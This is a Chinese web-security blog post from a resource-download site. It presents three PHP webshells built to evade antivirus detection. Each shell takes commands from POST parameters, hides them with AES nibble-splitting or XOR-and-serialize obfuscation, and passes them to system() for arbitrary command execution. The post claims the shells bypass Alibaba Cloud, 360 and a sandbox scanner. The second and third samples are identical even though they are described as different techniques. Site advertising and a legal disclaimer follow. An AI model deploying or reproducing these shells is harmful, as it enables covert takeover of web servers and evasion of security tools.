首页 综合资源 WEB安全 正文

PHPwebshell免杀

WEB安全
2025-03-21 0 5,642

PHP webshell免杀

免杀原理:代码混淆,变量加密解密,危险函数绕过,添加无用变量,函数套壳

1. 免杀1

思路:采用反序列化+自定义加密解密函数绕过+分块加密

<?php
// 序列化函数
function serializeData($num1, $num2)
{
    // 创建一个关联数组来存储数据
    $data = [
        "num1" => $num1,
        "num2" => $num2
    ];
    // 使用PHP的serialize函数将数组序列化为字符串
    return serialize($data);
}
// 反序列化函数
function unserializeData($serializedString)
{
    // 使用PHP的unserialize函数将字符串反序列化为数组
    $data = unserialize($serializedString);
    return $data;
}
// 示例:序列化和反序列化
function get_data()
{
    $num1 = $_POST["num1"] ?? null;  // 获取num1,如果没有则为null
    $num2 = $_POST["num2"] ?? null;  // 获取num2,如果没有则为null
    return array($num1, $num2);


}


function get_system()
{
    $a = "sysaers";
    $b = "tem";
}
function encrypt($data, $key)
{
    $method = "AES-256-CBC";
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
    $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
    return base64_encode($iv . $encrypted);
}


// 解密函数
function decrypt($encrypted, $key)
{
    $data = base64_decode($encrypted);
    $ivLength = openssl_cipher_iv_length("AES-256-CBC");
    $iv = substr($data, 0, $ivLength);
    $encryptedData = substr($data, $ivLength);
    return openssl_decrypt($encryptedData, "AES-256-CBC", $key, 0, $iv);
}
function splitData($data)
{
    $part1 = "";
    $part2 = "";
    for ($i = 0; $i < strlen($data); $i++) {
        $byte = ord($data[$i]);
        $part1 .= chr($byte & 0x0F);  // 保留低4位
        $part2 .= chr($byte & 0xF0);  // 保留高4位
    }
    return [$part1, $part2];
}


// 合并数据
function mergeData($part1, $part2)
{
    $merged = "";
    for ($i = 0; $i < strlen($part1); $i++) {
        $byte1 = ord($part1[$i]);
        $byte2 = ord($part2[$i]);
        $merged .= chr($byte1 | $byte2);  // 按位或合并
    }
    return $merged;
}


// 序列化数据
$key = "my_secret_key_1234567890";
$data1 = get_data();
$data2 = $data1[0];
list($part1, $part2) = splitData($data2);
$encryptedPart1 = encrypt($part1, $key);
$encryptedPart2 = encrypt($part2, $key);


// 解密两部分数据
$decryptedPart1 = decrypt($encryptedPart1, $key);
$decryptedPart2 = decrypt($encryptedPart2, $key);
$message = "";
$mergedData = mergeData($decryptedPart1, $decryptedPart2);
system($mergedData, $message);
echo $message;


?>

2. 免杀2

思路:自定义加解密key+反序列化

<?php
// 序列化函数
function serializeData($num1, $num2)
{
    $data = [
        "num1" => $num1,
        "num2" => $num2
    ];
    return serialize($data);
}


// 反序列化函数
function unserializeData($serializedString)
{
    return unserialize($serializedString);
}


// XOR 加密函数
function xorEncrypt($data, $key)
{
    $encrypted = '';
    $keyLength = strlen($key);
    for ($i = 0; $i < strlen($data); $i++) {
        $encrypted .= $data[$i] ^ $key[$i % $keyLength];
    }
    return base64_encode($encrypted);
}


// XOR 解密函数
function xorDecrypt($encryptedData, $key)
{
    $data = base64_decode($encryptedData);
    $decrypted = '';
    $keyLength = strlen($key);
    for ($i = 0; $i < strlen($data); $i++) {
        $decrypted .= $data[$i] ^ $key[$i % $keyLength];
    }
    return $decrypted;
}


// 获取 POST 数据并加密
function get_post()
{
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $k = ${"_PO" . "ST"}["num1"];
        $B = ${"_PO" . "ST"}["num2"];


        // 序列化数据
        $serializedData = serializeData($k, $B);


        // 加密密钥
        $key = "your-secret-key"; // 密钥可以是任意字符串


        // 使用 XOR 加密序列化后的数据
        $encryptedData = xorEncrypt($serializedData, $key);


        return $encryptedData;
    }
    return null;
}


// 解密和反序列化
function decryptAndUnserialize($encryptedData, $key)
{
    // 解密数据
    $decryptedData = xorDecrypt($encryptedData, $key);


    // 反序列化数据
    $data = unserializeData($decryptedData);


    return $data;
}


// 示例:获取加密数据并解密
function getdata()
{
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // 获取加密数据
        $encryptedData = get_post();


        // 解密密钥
        $key = "your-secret-key"; // 必须与加密时一致


        // 解密并反序列化
        $decryptedData = decryptAndUnserialize($encryptedData, $key);
        echo $decryptedData["num1"];
        $message = '';
        system($decryptedData["num1"], $message);


        // 输出解密后的数据
        print_r($message);


    }
}
getdata();


?>

免杀3

免杀思路:魔法函数+自定义加解密

<?php
// 序列化函数
function serializeData($num1, $num2)
{
    $data = [
        "num1" => $num1,
        "num2" => $num2
    ];
    return serialize($data);
}


// 反序列化函数
function unserializeData($serializedString)
{
    return unserialize($serializedString);
}


// XOR 加密函数
function xorEncrypt($data, $key)
{
    $encrypted = '';
    $keyLength = strlen($key);
    for ($i = 0; $i < strlen($data); $i++) {
        $encrypted .= $data[$i] ^ $key[$i % $keyLength];
    }
    return base64_encode($encrypted);
}


// XOR 解密函数
function xorDecrypt($encryptedData, $key)
{
    $data = base64_decode($encryptedData);
    $decrypted = '';
    $keyLength = strlen($key);
    for ($i = 0; $i < strlen($data); $i++) {
        $decrypted .= $data[$i] ^ $key[$i % $keyLength];
    }
    return $decrypted;
}


// 获取 POST 数据并加密
function get_post()
{
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $k = ${"_PO" . "ST"}["num1"];
        $B = ${"_PO" . "ST"}["num2"];


        // 序列化数据
        $serializedData = serializeData($k, $B);


        // 加密密钥
        $key = "your-secret-key"; // 密钥可以是任意字符串


        // 使用 XOR 加密序列化后的数据
        $encryptedData = xorEncrypt($serializedData, $key);


        return $encryptedData;
    }
    return null;
}


// 解密和反序列化
function decryptAndUnserialize($encryptedData, $key)
{
    // 解密数据
    $decryptedData = xorDecrypt($encryptedData, $key);


    // 反序列化数据
    $data = unserializeData($decryptedData);


    return $data;
}


// 示例:获取加密数据并解密
function getdata()
{
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // 获取加密数据
        $encryptedData = get_post();


        // 解密密钥
        $key = "your-secret-key"; // 必须与加密时一致


        // 解密并反序列化
        $decryptedData = decryptAndUnserialize($encryptedData, $key);
        echo $decryptedData["num1"];
        $message = '';
        system($decryptedData["num1"], $message);


        // 输出解密后的数据
        print_r($message);


    }
}
getdata();


?>

PHPwebshell免杀

阿里云免杀

PHPwebshell免杀

360免杀

PHPwebshell免杀

微步沙箱

PHPwebshell免杀

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

注:在使用本系统时,使用方必须在国家相关法律法规范围内并经过国家相关部门的授权许可,禁止用于一切非法行为。使用用途仅限于测试、实验、研究为目的,禁止用于一切商业运营,本团队不承担使用者在使用过程中的任何违法行为负责。

83源码 WEB安全 PHPwebshell免杀 https://www.83ym.com/90.html

认准唯一TG:@ym830

上一篇: 微软警告:新型远程访问木马 StilachiRAT 正在袭击用户证书和加密钱包
下一篇: Java Spring框架修复两项安全漏洞,开发者需立即重视
常见问题

VIP会员是否无限次下载资源?

  • 站内所有资源,针对不同等级VIP会员可直接下载,特殊资源商品会注明是否免费,指会员所享有根据选择购买的会员选项所享有的特殊服务,具体以本站公布的服务内容为准。
查看详情

正规的网络棋牌运营商需要具备哪些资质?

  • 按照我国的法律规定,运营网络棋牌首先需要成立一个注册正规备案的公司,然后申请网站备案、文网文、ICP等等,这些证件缺一不可。 一.注册公司 在当地工商进行注册,公司名称以“XX科技有限公司”为名,如:富裕棋牌经营范围填写“计算机软硬件、网络设备的设计开发与购销”。 二.域名及网站备案 在国内从事网站经营活动就必须经过相关部门的备案,因此棋牌运营商在购买了域名后,就要到当地网监局办理网站备案,或者请服务器提供商代为备案。 三.申请文网文 文网文全称为网络文化经营许可证,是从事经营性互联网文化活动所必需的资质。一般是需要到当地省一级(省、直辖市、自治区)的文化行政部门提出申请,并经由当地的文化行政部门合法批准。次资质要求申请公司注册资金必需达到1000万,并提供游戏版权证明文件。 四.申请ICP ICP又称为增值电信业务许可证,所有网络游戏运营商均需要办理ICP许可证,此证件要求公司注册资金1000万,需到当地市级通讯管理局办理。 五.申请文网游——游戏备案 根据《网络游戏管理暂行办法》(文化部第49号)的规定,国产网络游戏在上网运营之日起30日内应当按规定向国务院文化行政部门履行备案手续。 以上就是网络棋牌游戏正规运营所必需的资质证明。一般作为正规有实力的棋牌游戏开发公司,不光要具备所有的正规资质,而且会对投资者、代理商等合作伙伴给予相关指导和协助,与合作伙伴携手共赢!
查看详情

相关文章

猜你喜欢
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
反诈公益广告 到期时间:2030/04/30
热门推荐
热门标签
首页 VIP 菜单 客服 我的